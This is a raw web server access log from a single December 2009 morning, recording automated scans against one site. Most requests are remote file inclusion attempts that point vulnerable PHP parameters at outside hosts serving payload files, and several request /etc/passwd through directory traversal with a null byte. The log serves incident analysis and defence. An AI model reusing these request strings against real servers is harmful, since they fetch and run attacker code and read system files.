82.195.252.206 - - [13/Dec/2009:10:20:18 -0800] "GET /logs/access_090521.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:20:47 -0800] "GET /logs/access_090805.log/xGB.php?act=admin&do=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:20:47 -0800] "GET /logs/xGB.php?act=admin&do=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:20:48 -0800] "GET /logs/access_080424.log/xGB.php?act=admin&do=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:20:48 -0800] "GET /xGB.php?act=admin&do=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:20:51 -0800] "GET /logs/access_090805.log/xGB.php?act=admin&do=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:20:51 -0800] "GET /logs/access_080424.log/xGB.php?act=admin&do=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:20:51 -0800] "GET /logs/xGB.php?act=admin&do=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:20:53 -0800] "GET /xGB.php?act=admin&do=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.94.98.98 - - [13/Dec/2009:10:22:12 -0800] "GET /SQuery/lib/gore.php?libpath=http://80.59.160.167/pwalb.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
201.24.212.133 - - [13/Dec/2009:10:22:16 -0800] "GET /index.php?main=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 14836 "-" "libwww-perl/5.813" "www.dmulk.com"
201.24.212.133 - - [13/Dec/2009:10:22:44 -0800] "GET /logs/access_090308.log/index.php?main=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
201.24.212.133 - - [13/Dec/2009:10:22:45 -0800] "GET /index.php?main=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 14836 "-" "libwww-perl/5.813" "www.dmulk.com"
201.24.212.133 - - [13/Dec/2009:10:22:46 -0800] "GET /logs/index.php?main=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:22:55 -0800] "GET /logs/access_090805.log%20%20/xGB.php?act=admin&do=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:22:56 -0800] "GET /logs/access_080424.log%20%20/xGB.php?act=admin&do=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:22:58 -0800] "GET /logs/access_090805.log%20%20/xGB.php?act=admin&do=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:22:58 -0800] "GET /logs/access_080424.log%20%20/xGB.php?act=admin&do=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:23:13 -0800] "GET /logs/access_090604.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
201.24.212.133 - - [13/Dec/2009:10:23:48 -0800] "GET /logs/access_090306.log/index.php?main=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:23:48 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:23:48 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:23:49 -0800] "GET /logs/access_080308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:23:49 -0800] "GET /logs/access_090513.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:23:53 -0800] "GET /logs/access_080314.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:23:57 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:23:57 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:23:57 -0800] "GET /logs/access_080308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:10:23:58 -0800] "GET /logs/access_090513.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:10:23:58 -0800] "GET /logs/access_080514.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:24:01 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:24:01 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:24:01 -0800] "GET /logs/access_080308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:24:01 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:24:01 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:24:02 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:24:02 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:24:02 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:24:02 -0800] "GET /logs/access_080308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:24:03 -0800] "GET /logs/access_080314.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:24:05 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:24:05 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:24:05 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:24:07 -0800] "GET /logs/access_080314.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:10:24:11 -0800] "GET /logs/access_080314.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:24:15 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:24:17 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:26:32 -0800] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:26:32 -0800] "GET /logs/access_080111.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:26:34 -0800] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:26:34 -0800] "GET /logs/access_080111.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:10:26:43 -0800] "GET /logs/access_081104.log%20%20//index2.php?mosConfig_absolute_path=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:10:26:43 -0800] "GET /index2.php?mosConfig_absolute_path=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:10:26:43 -0800] "GET /logs//index2.php?mosConfig_absolute_path=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.94.98.98 - - [13/Dec/2009:10:27:07 -0800] "GET /logs/access_081023.log/SQuery/lib/gore.php?libpath=http://80.59.160.167/pwalb.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
80.94.98.98 - - [13/Dec/2009:10:27:07 -0800] "GET /SQuery/lib/gore.php?libpath=http://80.59.160.167/pwalb.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
80.94.98.98 - - [13/Dec/2009:10:27:07 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://80.59.160.167/pwalb.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:10:27:47 -0800] "GET /logs/access_091115.log%20%20//index2.php?mosConfig_absolute_path=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:28:25 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:28:25 -0800] "GET /convert/mvcw.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:28:25 -0800] "GET /logs/access_080901.log/convert/mvcw.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:28:39 -0800] "GET /logs/access_080706.log/convert/mvcw.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:29:16 -0800] "GET /logs/access_080901.log/convert/mvcw.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:29:16 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:29:16 -0800] "GET /logs/access_080706.log/convert/mvcw.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:29:16 -0800] "GET /convert/mvcw.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:10:29:33 -0800] "GET /logs/access_081104.log//index2.php?mosConfig_absolute_path=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:10:29:49 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:10:29:49 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:10:29:49 -0800] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:10:29:52 -0800] "GET /logs/access_081115.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:29:55 -0800] "GET /logs/access_091128.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:29:55 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:29:55 -0800] "GET /logs/access_091030.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.190.41.101 - - [13/Dec/2009:10:29:58 -0800] "GET /logs/access_091203.log///?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:29:58 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
93.190.41.101 - - [13/Dec/2009:10:29:58 -0800] "GET /logs///?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
93.190.41.101 - - [13/Dec/2009:10:29:59 -0800] "GET //?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 14949 "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:10:30:03 -0800] "GET /logs///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:10:30:03 -0800] "GET //?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 200 14928 "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:10:30:04 -0800] "GET /logs/access_091203.log%20%20///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:10:30:04 -0800] "GET /logs/access_091115.log//index2.php?mosConfig_absolute_path=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [13/Dec/2009:10:31:27 -0800] "GET /logs/access_091203.log///?_zb_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [13/Dec/2009:10:31:27 -0800] "GET /logs///?_zb_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [13/Dec/2009:10:31:28 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
72.55.143.249 - - [13/Dec/2009:10:31:28 -0800] "GET //?_zb_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 200 14953 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.96.210 - - [13/Dec/2009:10:31:35 -0800] "GET /robots.txt HTTP/1.0" 200 36 "http://majestic12.co.uk/bot.php?I=8673D874E0-6B05F84858FCF50F-www_dmulk_com" "Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
91.121.96.210 - - [13/Dec/2009:10:31:36 -0800] "GET /logs/access_080110.log HTTP/1.0" 200 682778 "http://www.oounet.com/index/click?url=http://www.dmulk.com/logs/access_080110.log&query_id=36734&lang=" "Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
91.121.96.210 - - [13/Dec/2009:10:31:40 -0800] "GET /logs/access_090206.log HTTP/1.0" 200 917504 "http://www.oounet.com/index/click?url=http://www.dmulk.com/logs/access_090206.log&query_id=129595&lang=en/" "Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
91.121.96.210 - - [13/Dec/2009:10:31:43 -0800] "GET /logs/access_090211.log HTTP/1.0" 200 917504 "http://www.oounet.com/index/click?url=http://www.dmulk.com/logs/access_090211.log&query_id=129595&lang=en/" "Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:31:49 -0800] "GET /logs/access_090710.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:31:49 -0800] "GET /logs/access_091004.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:31:49 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 130082 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:31:49 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 14953 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [13/Dec/2009:10:31:51 -0800] "GET /logs/access.log///?_zb_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [13/Dec/2009:10:31:55 -0800] "GET /logs/access_080912.log//?_SERVER[DOCUMENT_ROOT]=http://bitexconamlong.com.vn/includes/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [13/Dec/2009:10:31:55 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://bitexconamlong.com.vn/includes/idxx.txt?? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [13/Dec/2009:10:31:56 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://bitexconamlong.com.vn/includes/idxx.txt?? HTTP/1.1" 200 14953 "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:10:32:05 -0800] "GET /logs/access_080504.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:10:32:09 -0800] "GET /logs/access_081115.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:32:13 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:32:13 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:32:13 -0800] "GET /logs/access_080706.log/convert/mvcw.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [13/Dec/2009:10:32:13 -0800] "GET /logs///?_zb_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [13/Dec/2009:10:32:13 -0800] "GET //?_zb_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 200 14952 "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:32:14 -0800] "GET /logs/access_080901.log/convert/mvcw.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:32:28 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:32:28 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:32:28 -0800] "GET /logs/access_080901.log/convert/mvcw.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:32:28 -0800] "GET /logs/access_080706.log/convert/mvcw.php?step=1&vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [13/Dec/2009:10:32:32 -0800] "GET /logs/access_091203.log///?_zb_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:10:32:36 -0800] "GET /logs/access_091203.log///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:10:32:37 -0800] "GET /logs///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:10:32:37 -0800] "GET //?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 14915 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.104 - - [13/Dec/2009:10:32:48 -0800] "GET /logs//bbs//skin/zero_vote/setup.php?dir=http://lukas-wuerzburger.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
78.110.50.104 - - [13/Dec/2009:10:32:49 -0800] "GET /bbs//skin/zero_vote/setup.php?dir=http://lukas-wuerzburger.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:10:32:51 -0800] "GET /logs/access_091203.log///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:10:32:51 -0800] "GET //?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 14914 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:10:32:51 -0800] "GET /logs///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [13/Dec/2009:10:32:55 -0800] "GET /logs/access.log///?_zb_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.190.41.101 - - [13/Dec/2009:10:33:07 -0800] "GET /logs/access_091203.log///?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
